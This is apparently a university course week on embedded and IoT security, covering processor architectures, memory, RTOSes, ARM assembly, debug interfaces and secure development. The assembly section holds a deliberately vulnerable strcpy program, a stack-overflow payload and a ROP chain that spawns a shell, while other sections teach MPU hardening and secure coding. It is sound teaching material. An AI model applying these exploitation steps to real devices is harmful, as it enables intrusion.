CSY304 Week 03 - Embedded security connects directly to earlier foundations:

Opening Framing: The Embedded Reality

IoT security requires understanding the embedded systems that power IoT devices. Unlike general-purpose computers, embedded systems feature specialized processors (ARM Cortex-M, MIPS, Xtensa), run bare-metal code or real-time operating systems, and operate under severe resource constraints. This isn't just academic—these constraints directly create exploitable vulnerabilities.

A smart thermostat might have 256KB of flash and 64KB of RAM. A fitness tracker may run on a battery for months. A security camera processes video on a <$5 ARM Cortex-M4. These constraints shape every security decision—or more often, the compromise. Understanding embedded architecture reveals why certain vulnerabilities exist and how to exploit them.

Why This Week Matters

The Embedded Attack Surface: 75 billion IoT devices are projected by 2025. Every smart home, industrial sensor, and medical device runs embedded code. Understanding ARM assembly isn't optional—it's how you read the firmware you extract, understand exploit mitigation bypasses, and write exploits that actually work on resource-constrained targets.

Real-World Context: Major IoT breaches (Mirai, VPNFilter, Ripple20) all required understanding embedded systems to discover and exploit. The URGENT/11 vulnerabilities affected VxWorks across 200 million devices—exploiting them required deep embedded knowledge.

Career Relevance: Embedded security specialists are in high demand. Companies building IoT products, automotive systems, and medical devices desperately need engineers who understand both security and embedded constraints.

Learning Outcomes

By the end of this week, you will be able to:

Identify and compare ARM Cortex-M vs Cortex-A architectures
Understand memory layouts and protection mechanisms in embedded systems
Read basic ARM assembly and trace function execution
Recognize common RTOSes (FreeRTOS, Zephyr) and their security properties
Identify debug interfaces (UART, JTAG, SWD) on target boards
Explain why embedded constraints lead to specific vulnerability classes

Real-World Attack Vectors

MITRE ATT&CK for ICS Mapping:

T0823 - Exploit Public-Facing Application: Embedded web servers
T0886 - Remote Services: Debug interfaces left accessible
T0873 - Project File Infection: Firmware image tampering

Key insight: Embedded systems trade security for resource efficiency. Every feature removed to save kilobytes of flash is a potential attack vector. Understanding what's missing helps you exploit what's present.

1) Processor Architectures

Understanding processor architectures is fundamental to IoT exploitation. Each architecture has unique characteristics, security features, and typical deployment patterns. Knowing which processor powers a target device tells you what tools to use, what exploits might work, and what defenses you'll encounter.

ARM Cortex-M Series (Microcontrollers)

ARM CORTEX-M DETAILED BREAKDOWN:

┌─────────────────────────────────────────────────────────────┐
│ Cortex-M0/M0+ (Entry-Level):                                │
│ ─────────────────────────────────────────────────────────── │
│ Clock: 50-100 MHz                                           │
│ Flash: 16-256 KB                                            │
│ RAM: 2-32 KB                                                │
│                                                             │
│ Common devices: Smart sensors, Bluetooth beacons,           │
│                 simple wearables                            │
│                                                             │
│ Security features:                                          │
│ - Basic MPU (optional)                                      │
│ - No TrustZone                                              │
│ - Limited hardware crypto                                   │
│                                                             │
│ Attack surface: Minimal, often bare-metal code              │
│ Exploitation: Buffer overflows, memory corruption           │
└─────────────────────────────────────────────────────────────┘

┌─────────────────────────────────────────────────────────────┐
│ Cortex-M3/M4/M4F (Mainstream):                              │
│ ─────────────────────────────────────────────────────────── │
│ Clock: 80-200 MHz                                           │
│ Flash: 128KB - 2MB                                          │
│ RAM: 32KB - 256KB                                           │
│                                                             │
│ Common devices: Fitness trackers, smart thermostats,        │
│                 IoT gateways, drone controllers             │
│                                                             │
│ Security features:                                          │
│ - MPU (8 regions, fully configurable)                       │
│ - Hardware AES acceleration (M4F)                           │
│ - DSP instructions (M4/M4F)                                 │
│ - No TrustZone (pre-v8M architecture)                       │
│                                                             │
│ Example real devices:                                       │
│ - STM32F4 series (drones, 3D printers)                      │
│ - NRF52 (Bluetooth IoT devices)                             │
│ - TI CC26xx (Zigbee devices)                                │
│                                                             │
│ Attack surface: RTOS applications, network stacks           │
│ Exploitation: Stack overflows, integer overflows,           │
│              format strings, ROP chains                     │
└─────────────────────────────────────────────────────────────┘

┌─────────────────────────────────────────────────────────────┐
│ Cortex-M7 (High Performance):                               │
│ ─────────────────────────────────────────────────────────── │
│ Clock: 400-600 MHz                                          │
│ Flash: 512KB - 2MB                                          │
│ RAM: 256KB - 1MB                                            │
│                                                             │
│ Common devices: Industrial controllers, high-end cameras,   │
│                 automotive infotainment                     │
│                                                             │
│ Security features:                                          │
│ - MPU (16 regions)                                          │
│ - Instruction/data cache (side-channel risks!)              │
│ - Hardware crypto (AES, HASH)                               │
│                                                             │
│ Attack considerations:                                      │
│ - Cache timing side-channels possible                       │
│ - More complex software = more bugs                         │
└─────────────────────────────────────────────────────────────┘

┌─────────────────────────────────────────────────────────────┐
│ Cortex-M23/M33 (ARMv8-M with TrustZone):                    │
│ ─────────────────────────────────────────────────────────── │
│ Released: 2016, still deploying in new designs              │
│                                                             │
│ NEW Security Features:                                      │
│ - TrustZone-M (secure/non-secure world isolation)           │
│ - Secure Attribution Unit (SAU)                             │
│ - Secure gateway instructions                               │
│ - Stack limit checking registers                            │
│                                                             │
│ Security architecture:                                      │
│ ┌──────────────────┐     ┌──────────────────┐              │
│ │  Non-Secure      │────▶│  Secure World    │              │
│ │  Application     │ NSC │  (Trusted code)  │              │
│ │  (Normal code)   │◀────│  (Crypto, keys)  │              │
│ └──────────────────┘     └──────────────────┘              │
│                                                             │
│ Common devices: Next-gen IoT security implementations       │
│                                                             │
│ Attack surface:                                             │
│ - TrustZone misconfiguration vulnerabilities                │
│ - Non-secure to secure world transition bugs                │
│ - SAU bypass attempts                                       │
└─────────────────────────────────────────────────────────────┘

ARM Cortex-A Series (Application Processors)

CORTEX-A vs CORTEX-M COMPARISON:

┌─────────────────────────────────────────────────────────────┐
│ Feature           │ Cortex-M         │ Cortex-A            │
│───────────────────┼──────────────────┼─────────────────────│
│ Target Use        │ Microcontroller  │ Application CPU     │
│ Clock Speed       │ 50-600 MHz       │ 800MHz - 2GHz+      │
│ Memory            │ KB scale         │ MB/GB scale         │
│ OS                │ RTOS/bare-metal  │ Linux, Android      │
│ MMU               │ No (MPU only)    │ Yes (full virtual)  │
│ Cache             │ Optional         │ Standard (L1/L2)    │
│ Power             │ Ultra-low        │ Moderate-high       │
│ Cost              │ $1-10            │ $10-100+            │
│ Attack Surface    │ Minimal          │ Large (full OS)     │
└─────────────────────────────────────────────────────────────┘

Cortex-A Series Examples:
┌─────────────────────────────────────────────────────────────┐
│ Cortex-A7/A8:                                               │
│ - IP cameras (Hikvision, Dahua)                            │
│ - Budget routers (TP-Link, D-Link)                         │
│ - Set-top boxes                                             │
│ - Runs Linux 3.x/4.x (often outdated kernels)               │
│                                                             │
│ Cortex-A53:                                                 │
│ - Raspberry Pi 3/4                                          │
│ - High-end routers                                          │
│ - NAS devices (Synology, QNAP)                              │
│                                                             │
│ Security implications:                                      │
│ - Full Linux attack surface (kernel exploits)               │
│ - Network services (SSH, HTTP, Telnet)                      │
│ - Privilege escalation opportunities                        │
│ - Often running outdated, vulnerable kernels                │
└─────────────────────────────────────────────────────────────┘

MIPS Architecture

MIPS IN IoT DEVICES:

┌─────────────────────────────────────────────────────────────┐
│ Common in legacy and consumer IoT:                          │
│ - Home routers (especially older models)                    │
│ - Set-top boxes                                             │
│ - IP cameras (many Chinese manufacturers)                   │
│ - VoIP phones                                               │
│                                                             │
│ Variations:                                                 │
│ MIPS32: 32-bit (most common in IoT)                         │
│ MIPS64: 64-bit (rare in IoT)                                │
│                                                             │
│ Endianness:                                                 │
│ - Little-endian (EL): Host byte order                       │
│ - Big-endian (EB): Network byte order                       │
│ ⚠️ Must match when cross-compiling exploits!                │
│                                                             │
│ Security characteristics:                                   │
│ - No NX bit in older MIPS (shellcode in stack works)        │
│ - Cache architecture enables side-channel attacks           │
│ - Many devices run ancient Linux kernels (2.6.x)            │
│                                                             │
│ Exploitation notes:                                         │
│ - Different calling convention vs ARM/x86                   │
│ - Return address in $ra register                            │
│ - Shellcode must be MIPS assembly                           │
│ - Tools: QEMU MIPS emulation, buildroot for toolchain       │
└─────────────────────────────────────────────────────────────┘

ESP32/ESP8266 (Xtensa)

ESPRESSIF XTENSA ARCHITECTURE:

┌─────────────────────────────────────────────────────────────┐
│ ESP8266:                                                    │
│ - 80/160 MHz Xtensa L106                                    │
│ - 64 KB instruction RAM, 96 KB data RAM                     │
│ - WiFi 802.11 b/g/n integrated                              │
│ - Ultra low cost ($2-4)                                     │
│ - Massive maker/hobby adoption                              │
│                                                             │
│ Common devices:                                             │
│ - Smart plugs (Sonoff, Tuya)                                │
│ - Smart bulbs                                               │
│ - Environmental sensors                                     │
│ - DIY IoT projects                                          │
│                                                             │
│ ESP32:                                                      │
│ - Dual-core 240 MHz Xtensa LX6                              │
│ - 520 KB SRAM                                               │
│ - WiFi + Bluetooth/BLE integrated                           │
│ - Hardware crypto (AES, SHA, RSA)                           │
│                                                             │
│ Security features (ESP32):                                  │
│ - Secure boot (RSA signature verification)                  │
│ - Flash encryption (AES-256)                                │
│ - Hardware random number generator                          │
│ - Dedicated crypto coprocessor                              │
│                                                             │
│ Common vulnerabilities:                                     │
│ - Hardcoded WiFi credentials in flash                       │
│ - Cleartext firmware updates                                │
│ - Debug pins accessible                                     │
│ - Flash encryption not enabled (default off!)               │
│                                                             │
│ Attack approach:                                            │
│ 1. Physical access → dump flash via UART bootloader         │
│ 2. Extract firmware → binwalk analysis                      │
│ 3. Find WiFi creds, API keys in cleartext                   │
│ 4. OTA update interception (if no signature check)          │
└─────────────────────────────────────────────────────────────┘

Architecture Selection and Security Impact

CHOOSING ARCHITECTURE FOR SECURITY:

┌─────────────────────────────────────────────────────────────┐
│ Security Tier 1: High Security Requirements                 │
│ (Medical devices, automotive, industrial)                   │
│                                                             │
│ Recommended:                                                │
│ - ARM Cortex-M33/M35P (TrustZone-M)                         │
│ - Cortex-A with TrustZone-A                                 │
│                                                             │
│ Features needed:                                            │
│ ✓ Hardware isolation (TrustZone)                            │
│ ✓ Secure boot mandatory                                     │
│ ✓ Hardware crypto acceleration                              │
│ ✓ Secure firmware updates                                   │
│ ✓ Physical attack resistance                                │
│                                                             │
│ Security Tier 2: Moderate Security                          │
│ (Smart home, wearables, consumer IoT)                       │
│                                                             │
│ Recommended:                                                │
│ - ARM Cortex-M4/M7 with MPU                                 │
│ - ESP32 with secure boot + flash encryption                 │
│                                                             │
│ Features needed:                                            │
│ ✓ MPU for memory protection                                 │
│ ✓ Encrypted storage option                                  │
│ ✓ Signed firmware updates                                   │
│ ⚠ TrustZone not critical but beneficial                     │
│                                                             │
│ Security Tier 3: Cost-Optimized                             │
│ (Disposable sensors, simple devices)                        │
│                                                             │
│ Acceptable:                                                 │
│ - ARM Cortex-M0+                                            │
│ - ESP8266                                                   │
│                                                             │
│ Minimal features:                                           │
│ ✓ Input validation in code                                  │
│ ✓ Basic authentication                                      │
│ ⚠ Accept higher risk for lower cost                         │
└─────────────────────────────────────────────────────────────┘

2) Memory and Storage

EMBEDDED MEMORY ARCHITECTURE:

MEMORY TYPES:
┌─────────────────────────────────────────────────────────────┐
│ Flash (Non-volatile):                                       │
│ - Stores firmware/code                                      │
│ - Survives power cycles                                     │
│ - Limited write cycles (wear leveling)                      │
│ - Often externally accessible (attack target)               │
│                                                             │
│ RAM (Volatile):                                             │
│ - Runtime data, stack, heap                                 │
│ - Kilobytes to megabytes                                    │
│ - Contains secrets during operation                         │
│                                                             │
│ EEPROM:                                                     │
│ - Configuration storage                                     │
│ - WiFi credentials, calibration data                        │
│ - Often unencrypted                                         │
│                                                             │
│ External Storage:                                           │
│ - SD cards, SPI flash chips                                 │
│ - Easily removed and analyzed                               │
└─────────────────────────────────────────────────────────────┘

MEMORY PROTECTION:
┌─────────────────────────────────────────────────────────────┐
│ MPU (Memory Protection Unit):                               │
│ - Defines memory region permissions                         │
│ - Execute/read/write controls                               │
│ - Can prevent code execution from RAM                       │
│ - Often unused in simple devices                            │
│                                                             │
│ Common Weaknesses:                                          │
│ - No MPU configured (everything accessible)                 │
│ - Stack/heap in executable memory                           │
│ - No ASLR (addresses predictable)                           │
│ - No stack canaries                                         │
└─────────────────────────────────────────────────────────────┘

3) Real-Time Operating Systems

COMMON IoT OPERATING SYSTEMS:

BARE METAL (No OS):
┌─────────────────────────────────────────────────────────────┐
│ - Direct hardware access                                    │
│ - Simple interrupt-driven loops                             │
│ - Minimal attack surface                                    │
│ - No process isolation                                      │
│ - Common in simple sensors                                  │
└─────────────────────────────────────────────────────────────┘

FreeRTOS:
┌─────────────────────────────────────────────────────────────┐
│ - Most popular RTOS for microcontrollers                    │
│ - AWS IoT integration                                       │
│ - Task scheduling, queues, semaphores                       │
│ - No memory protection between tasks by default             │
│ - TLS and crypto libraries available                        │
└─────────────────────────────────────────────────────────────┘

Zephyr:
┌─────────────────────────────────────────────────────────────┐
│ - Linux Foundation project                                  │
│ - Strong security focus                                     │
│ - Memory protection, secure boot support                    │
│ - Growing adoption in commercial IoT                        │
└─────────────────────────────────────────────────────────────┘

Embedded Linux:
┌─────────────────────────────────────────────────────────────┐
│ - Full Linux kernel on Cortex-A or MIPS                     │
│ - Familiar attack vectors (buffer overflows, privesc)       │
│ - BusyBox common (minimal userland)                         │
│ - Often outdated kernels with known CVEs                    │
└─────────────────────────────────────────────────────────────┘

4) ARM Assembly Basics

ARM assembly fluency is non-negotiable for IoT exploitation. You need to read disassembly to understand what firmware does, write shellcode to exploit vulnerabilities, and build ROP chains to bypass protections. This section covers the essentials through a practical exploitation lens.

Registers and Calling Convention

ARM ASSEMBLY FUNDAMENTALS:

REGISTERS (ARM Cortex-M):
┌─────────────────────────────────────────────────────────────┐
│ R0-R12: General purpose                                     │
│ R13 (SP): Stack Pointer                                     │
│ R14 (LR): Link Register (return address)                    │
│ R15 (PC): Program Counter                                   │
│ CPSR: Current Program Status Register (flags)               │
│                                                             │
│ FUNCTION CALLING CONVENTION (AAPCS):                        │
│ Arguments: R0, R1, R2, R3 (then stack)                      │
│ Return value: R0                                            │
│ Callee-saved: R4-R11 (must preserve)                        │
│ Caller-saved: R0-R3, R12 (can be clobbered)                 │
└─────────────────────────────────────────────────────────────┘

COMMON INSTRUCTIONS:
┌─────────────────────────────────────────────────────────────┐
│ Data Movement:                                              │
│ MOV R0, #5       ; R0 = 5 (immediate value)                │
│ MOV R0, R1       ; R0 = R1 (register to register)          │
│                                                             │
│ Arithmetic:                                                 │
│ ADD R0, R1, R2   ; R0 = R1 + R2                             │
│ SUB R0, R1, #10  ; R0 = R1 - 10                             │
│ MUL R0, R1, R2   ; R0 = R1 * R2                             │
│                                                             │
│ Memory Access:                                              │
│ LDR R0, [R1]     ; Load word from memory @ R1 into R0      │
│ LDR R0, [R1, #4] ; Load from R1 + 4 offset                  │
│ STR R0, [R1]     ; Store R0 to memory @ R1                  │
│ LDRB R0, [R1]    ; Load byte (8-bit)                        │
│                                                             │
│ Comparison & Branching:                                     │
│ CMP R0, R1       ; Compare R0 and R1 (set flags)            │
│ BEQ label        ; Branch if equal (Z flag set)             │
│ BNE label        ; Branch if not equal                      │
│ BGT label        ; Branch if greater than                   │
│ B label          ; Un conditional branch (goto)             │
│                                                             │
│ Function Calls:                                             │
│ BL function      ; Branch with link (call function)         │
│                   ; Saves return addr in LR, jumps to func  │
│ BX LR            ; Branch exchange, return from function   │
│                                                             │
│ Stack Operations:                                           │
│ PUSH {R4-R7, LR} ; Save registers to stack                  │
│ POP {R4-R7, PC}  ; Restore and return (PC = LR)             │
└─────────────────────────────────────────────────────────────┘

Stack Buffer Overflow Exploitation

COMPLETE EXPLOITATION WALKTHROUGH:

Vulnerable C Code:
┌─────────────────────────────────────────────────────────────┐
│ #include                                           │
│ #include                                          │
│                                                             │
│ void vulnerable_function(char *input) {                     │
│     char buffer[64];                                        │
│     strcpy(buffer, input);  // No bounds check!             │
│     printf("You entered: %s\n", buffer);                     │
│ }                                                           │
│                                                             │
│ int main(int argc, char **argv) {                           │
│     if (argc < 2) return 1;                                 │
│     vulnerable_function(argv[1]);                           │
│     return 0;                                               │
│ }                                                           │
└─────────────────────────────────────────────────────────────┘

Compile for ARM (disable protections):
$ arm-linux-gnueabi-gcc -g -fno-stack-protector -z execstack \
  -o vuln vuln.c

Generated ARM Assembly (vulnerable_function):
┌─────────────────────────────────────────────────────────────┐
│ vulnerable_function:                                        │
│     PUSH {R4, LR}         ; Save R4 and return address      │
│     SUB SP, SP, #72       ; Allocate 72 bytes on stack      │
│     MOV R4, R0            ; Save input pointer to R4        │
│     ADD R0, SP, #8        ; R0 = &buffer (SP+8)             │
│     MOV R1, R4            ; R1 = input                      │
│     BL strcpy             ; Call strcpy (VULNERABLE!)       │
│     ... (printf call)                                       │
│     ADD SP, SP, #72       ; Deallocate stack                │
│     POP {R4, PC}          ; Restore R4 and return (PC=LR)   │
└─────────────────────────────────────────────────────────────┘

Stack Layout After PUSH:
┌─────────────────────────────────────────────────────────────┐
│ High Memory                                                 │
│ ┌───────────────────────────────────────────────────────┐ │
│ │ Saved R4                                              │ │
│ ├───────────────────────────────────────────────────────┤ │
│ │ Saved LR (return address) ← TARGET!                  │ │
│ ├───────────────────────────────────────────────────────┤ │
│ │ 72 bytes local storage                                │ │
│ │ (buffer starts at SP+8, 64 bytes)                     │ │
│ └───────────────────────────────────────────────────────┘ │
│ Low Memory (SP points here after SUB)                       │
└─────────────────────────────────────────────────────────────┘

Exploitation Strategy:
1. Buffer is 64 bytes at SP+8
2. Saved LR is at SP+72 (64 bytes buffer + 8 bytes padding + R4)
3. strcpy will overflow buffer, overwriting saved LR
4. When function returns (POP {R4, PC}), PC gets our value
5. We control program flow!

Building the Exploit:
┌─────────────────────────────────────────────────────────────┐
│ Payload structure:                                          │
│                                                             │
│ [      64 bytes padding       ]  Fill buffer               │
│ [    4 bytes junk for R4      ]  Overwrite saved R4        │
│ [    4 bytes return address   ]  Overwrite saved LR        │
│                                                             │
│ Example Python exploit:                                     │
│ payload = b"A" * 64              # Fill buffer             │
│ payload += b"BBBB"                # Junk for R4            │
│ payload += p32(0xdeadbeef)        # New return address     │
└─────────────────────────────────────────────────────────────┘

GDB Debugging Workflow:
$ gdb-multiarch ./vuln
(gdb) set architecture arm
(gdb) disassemble vulnerable_function
# Identify offset to saved LR

(gdb) run $(python -c 'print "A"*68 + "BBBB"')
# Program crashes with PC=0x42424242 ("BBBB")
# Confirms we control PC!

(gdb) x/20x $sp
# Examine stack to verify overwrite

Next step: Write ARM shellcode or ROP chain to gain code execution

Return-Oriented Programming (ROP)

ROP EXPLOITATION ON ARM:

Why ROP?
┌─────────────────────────────────────────────────────────────┐
│ - Stack is non-executable (NX bit enabled)                  │
│ - Can't execute shellcode on stack                          │
│ - Solution: Chain existing code "gadgets"                   │
│ - Each gadget ends with BX LR or POP {PC}                   │
└─────────────────────────────────────────────────────────────┘

Finding Gadgets:
$ ROPgadget --binary ./vuln --arch arm

Useful ARM Gadgets:
┌─────────────────────────────────────────────────────────────┐
│ 0x00010420: pop {r0, pc}         ; Load R0 from stack       │
│ 0x00010538: pop {r3, pc}         ; Load R3 from stack       │
│ 0x000106a0: mov r0, r4; blx r3   ; Call function in R3      │
│ 0x00010750: ldr r0, [r4]; bx lr  ; Deref pointer in R4      │
└─────────────────────────────────────────────────────────────┘

ROP Chain Example (call system("/bin/sh")):
┌─────────────────────────────────────────────────────────────┐
│ Goal: Execute system("/bin/sh")                             │
│                                                             │
│ ROP payload:                                                │
│ [padding] + [saved R4] + [ROP chain on stack]               │
│                                                             │
│ payload = b"A" * 64                                         │
│ payload += b"JUNK"           #  Saved R4                     │
│ payload += p32(pop_r0)       #  PC → pop {r0, pc}           │
│ payload += p32(binsh_addr)   #  R0 = "/bin/sh"              │
│ payload += p32(system_addr)  #  PC → system()              │
│                                                             │
│ Execution flow:                                             │
│ 1. Function returns, PC = pop_r0 gadget                     │
│ 2. Gadget pops binsh_addr into R0, then pops system_addr     │
│    into PC                                                   │
│ 3. Now executing system() with R0 = "/bin/sh"                │
│ 4. Shell spawned!                                           │
└─────────────────────────────────────────────────────────────┘

5) Debug Interfaces

HARDWARE DEBUG INTERFACES:

UART (Universal Asynchronous Receiver/Transmitter):
┌─────────────────────────────────────────────────────────────┐
│ Purpose: Serial console access                              │
│ Pins: TX, RX, GND (sometimes VCC)                           │
│ Baud rates: 9600, 115200 common                             │
│                                                             │
│ Security Value:                                             │
│ - Often provides root shell                                 │
│ - Boot logs reveal system information                       │
│ - May allow bootloader interrupt                            │
│                                                             │
│ Identification:                                             │
│ - Look for 4-pin headers on PCB                             │
│ - Use logic analyzer to detect baud rate                    │
│ - JTAGulator can automate pin identification                │
└─────────────────────────────────────────────────────────────┘

JTAG (Joint Test Action Group):
┌─────────────────────────────────────────────────────────────┐
│ Purpose: Debugging and testing                              │
│ Pins: TDI, TDO, TCK, TMS, (TRST)                            │
│                                                             │
│ Capabilities:                                               │
│ - Full processor control (halt, step, run)                  │
│ - Read/write memory                                         │
│ - Read/write registers                                      │
│ - Dump flash contents                                       │
│                                                             │
│ Tools: OpenOCD, JLink, Bus Pirate                           │
└─────────────────────────────────────────────────────────────┘

SWD (Serial Wire Debug):
┌─────────────────────────────────────────────────────────────┐
│ Purpose: ARM's 2-wire alternative to JTAG                   │
│ Pins: SWDIO, SWCLK                                          │
│ Common on: ARM Cortex-M devices                             │
│ Same capabilities as JTAG                                   │
└─────────────────────────────────────────────────────────────┘

🛡️ Defensive Architecture & Secure Embedded Development

Offensive skills show you how embedded systems break. Defensive skills show you how to build them securely from day one.

Secure Embedded Development Principles

Building secure embedded systems requires understanding the constraints and working with them, not against them. Security isn't about adding megabytes of protection\u2014it's about minimizing attack surface and using hardware security features effectively.

Memory Protection Configuration

ARM Cortex-M MPU Configuration:

// Define region for code (flash) - read-execute only
MPU->RBAR = FLASH_BASE | MPU_RBAR_VALID_Msk | 0;
MPU->RASR = MPU_RASR_ENABLE_Msk | MPU_RASR_XN_Msk | 
            MPU_RASR_SIZE_512KB | MPU_RASR_AP_ROPRIV;

// Define region for data - read-write, no execute
MPU->RBAR = RAM_BASE | MPU_RBAR_VALID_Msk | 1;
MPU->RASR = MPU_RASR_ENABLE_Msk | MPU_RASR_XN_Msk | 
            MPU_RASR_SIZE_64KB | MPU_RASR_AP_RWPRIV;

// Enable MPU
MPU->CTRL = MPU_CTRL_ENABLE_Msk | MPU_CTRL_PRIVDEFENA_Msk;

Result: Code execution from RAM blocked, preventing shellcode.

Secure Coding for Embedded

Common Embedded Vulnerabilities & Mitigations:

VULNERABILITY: Stack buffer overflow
BAD:  char buf[32]; strcpy(buf, user_input);
GOOD: char buf[32]; strncpy(buf, user_input, sizeof(buf)-1);
      buf[sizeof(buf)-1] = '\0';

VULNERABILITY: Integer overflow leading to buffer overflow
BAD:  uint8_t len = get_length();
      char *buf = malloc(len);
      memcpy(buf, data, len);
GOOD: uint16_t len = get_length();
      if (len > MAX_ALLOWED) return ERROR;
      char *buf = malloc(len + 1);  // Account for null
      if (!buf) return ERROR;
      memcpy(buf, data, len);

VULNERABILITY: Hardcoded credentials
BAD:  const char wifi_password[] = "password123";
GOOD: Store credentials in secure flash region or secure element
      Use device-unique keys, never hardcode

VULNERABILITY: Unprotected debug interfaces
BAD:  UART always enabled with root shell
GOOD: Disable UART in production builds
      If needed, require authentication
      Use TrustZone to isolate debug functionality

Hardening Checklist

Embedded System Hardening:

✓ Enable MPU/MMU if available
✓ Configure readable/writable/executable permissions
✓ Implement stack canaries (compiler flag: -fstack-protector-all)
✓ Disable JTAG/SWD in production (fuse programming)
✓ Implement secure boot with signature verification
✓ Use hardware crypto accelerator, never roll your own crypto
✓ Generate unique device keys during manufacturing
✓ Implement firmware encryption at rest
✓ Enable anti-rollback protection
✓ Implement input validation on all external data
✓ Minimize code size (reduce attack surface)
✓ Disable unused peripherals and services
✓ Implement watchdog timer for fault recovery
✓ Use TLS 1.3 for network communication
✓ Implement proper random number generation (TRNG)

Real-World Breach: VPNFilter (2018)

VPNFilter infected 500,000+ routers and NAS devices running embedded Linux. The malware survived reboots by writing to flash, demonstrating persistence on embedded systems.

Attack Vector: Exploited default credentials and unpatched vulnerabilities in embedded web servers. Once root access gained, malware wrote itself to flash for persistence.

Lessons Learned:

Disable default credentials\u2014force password change on first boot
Implement automatic security updates for embedded devices
Use code signing and verified boot to prevent persistent malware
Implement network segmentation\u2014IoT on separate VLAN
Monitor for anomalous firmware modifications

Secure SDLC for Embedded

Embedded Security Development Lifecycle:

1. Requirements Phase:
   - Define threat model (STRIDE for embedded)
   - Specify security requirements (encryption, auth, updates)
   - Choose hardware with security features (MPU, crypto accelerator)

2. Design Phase:
   - Architecture review\u2014minimize privile ged code
   - Define trust boundaries (TrustZone secure/normal world)
   - Plan key management and provisioning

3. Implementation Phase:
   - Follow MISRA C or CERT C coding standards
   - Use static analysis (Coverity, CodeSonar)
   - Implement security features early, not as add-ons

4. Verification Phase:
   - Fuzzing on protocol parsers
   - Penetration testing (hardware and firmware)
   - Side-channel analysis if handling secrets

5. Manufacturing:
   - Secure key injection (HSM-based)
   - Disable debug interfaces via efuses
   - Verify secure boot before shipping

6. Deployment & Maintenance:
   - Implement OTA updates with signing
   - Monitor for vulnerabilities in dependencies
   - Have incident response plan

Defensive Labs

Lab: Configure ARM Cortex-M MPU for W^X

Download ARM Cortex-M example code, configure the MPU to enforce write-xor-execute (W^X) policy. Test that code execution from RAM fails. Verify that buffer overflows cannot lead to shellcode execution.

Tools: QEMU ARM emulator, GCC ARM cross-compiler
Time: 60 minutes

Lab: Implement Secure Boot Verification

Write a simple bootloader that verifies firmware signature before execution. Use RSA-2048 or ECDSA-P256. Test that tampered firmware is rejected. Implement fallback to recovery mode on verification failure.

Tools: OpenSSL for key generation and signing, ARM toolchain
Time: 90 minutes

📚 Building on CSY101 Week-13: Use STRIDE to threat model your embedded system design before implementing. CSY102 Week-08: Apply cryptographic principles for secure boot and firmware encryption.

📚 Building on Prior Knowledge

Embedded security connects directly to earlier foundations:

CSY101 Week 08 (Network Security): Apply to constrained IoT protocols (6LoWPAN, Thread).
CSY102 Week 08 (Cryptography): Implement AES, ECC on resource-constrained devices.
CSY103 (Programming): C programming skills essential for embedded development and exploitation.
CSY104 Week 06 (OS Internals): RTOS concepts build on general OS knowledge.

🎯 Hands-On Labs (Free & Essential)

Apply what you learned through practical embedded system challenges. Complete these labs to build hands-on ARM and embedded exploitation skills.

🎮 Azeria Labs: ARM Assembly Basics

What you'll do: Learn ARM assembly from scratch through interactive tutorials. Understand registers, memory addressing, function calling conventions, and stack operations. Write and debug simple ARM programs.

Why it matters: ARM assembly is the language of IoT exploitation. You can't write exploits, analyze malware, or reverse engineer firmware without reading ARM code. This is foundational for all future IoT security work.
Time estimate: 2-3 hours

Start Azeria Labs ARM Assembly →

🎮 Exploit Education: Phoenix (ARM)

What you'll do: Complete the Phoenix ARM exploitation challenges. Start with stack buffer overflows, progress to format string vulnerabilities, and finish with ROP chains. Each challenge builds on the previous.

Why it matters: These are real exploitation techniques used against embedded devices. The skills transfer directly to IoT device exploitation. Understanding how to exploit ARM binaries is essential for offensive IoT security.
Time estimate: 4-5 hours

Start Phoenix ARM Challenges →

🔧 Lab: QEMU ARM Emulation Setup

What you'll do: Set up QEMU to emulate ARM devices. Install ARM cross-compilation toolchain. Compile and run a simple ARM program in QEMU. Set up GDB debugging for ARM binaries.

Why it matters: You can't always test on physical hardware. QEMU emulation lets you analyze ARM firmware without the device. This setup is used throughout the rest of the course for firmware analysis.
Time estimate: 1-1.5 hours

💡 Lab Strategy: Start with Azeria Labs to build ARM fundamentals. Then tackle Phoenix challenges to apply exploitation techniques. Set up QEMU for future firmware analysis work. Total: 700 XP across 7-9 hours of hands-on learning!

Guided Lab: ARM Assembly with Azeria Labs

Objective: Complete basic ARM assembly exercises to understand embedded code execution.

Time: 90 minutes

Lab Steps

Set up ARM Environment (20 min):
- Use QEMU ARM emulator or Raspberry Pi
- Install cross-compiler: arm-linux-gnueabi-gcc
Complete Azeria Labs Part 1 (30 min):
- Visit azeria-labs.com ARM Assembly Basics
- Work through registers and memory instructions
Analyze a Simple Buffer Overflow (40 min):
- Write vulnerable C program with strcpy
- Compile with -fno-stack-protector
- Use GDB to trace execution and observe LR overwrite

Success Criteria: Successfully traced ARM program execution and demonstrated stack buffer overflow control of PC.

Reading Resources (Free + Authoritative)

Complete the required resources to deepen your embedded systems understanding.

Azeria Labs: ARM Assembly Basics (Parts 1-3) · 90-120 min · 100 XP · Resource ID: csy304_w3_r1 (Required)
FreeRTOS Documentation: RTOS Fundamentals · 60 min · 50 XP · Resource ID: csy304_w3_r2 (Required)
ARM Architecture Documentation · Reference · 25 XP · Resource ID: csy304_w3_r3 (Optional)

Outcome Check

Identify common IoT processor architectures (ARM Cortex-M/A, MIPS, ESP32)
Explain embedded memory types and their security implications
Compare FreeRTOS, Zephyr, and embedded Linux
Read basic ARM assembly and understand function calls
Identify UART, JTAG, and SWD debug interfaces
Configure ARM Cortex-M MPU for memory protection
Implement secure coding practices for embedded systems

Resources

Azeria Labs ARM Assembly

Excellent ARM assembly tutorial series

FreeRTOS

Leading real-time operating system for IoT

Week 03 Quiz